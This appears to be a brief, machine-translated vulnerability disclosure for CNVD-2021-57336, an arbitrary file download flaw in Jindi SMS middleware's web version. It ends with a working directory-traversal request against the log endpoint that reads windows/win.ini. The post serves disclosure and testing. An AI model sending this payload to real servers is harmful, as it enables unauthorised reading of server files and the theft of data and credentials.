Jin Di Sms Middleware Web Version Log Any File Download Vulnerability In The Background Cnvd 2021 57336
Jin Di Sms Middleware Web Version Log Any File Download Vulnerability In The Background Cnvd 2021 57336
Jindi SMS Middleware Web Version log Any file download vulnerability in the background CNVD-2021-57336
Vulnerability Description
Jindi SMS middleware Web version background has a vulnerability to download any file on the server. The attacker can obtain any file information on the server through the vulnerability.
Vulnerability Impact
Golden flute SMS middleware web version
Network surveying and mapping
Vulnerability reappears
Login page
The vulnerability is log download
Verify POC
1
/log?action=view&pageIndex=1&name=../../../windows/win.ini
This post is licensed under CC BY 4.0 by the author.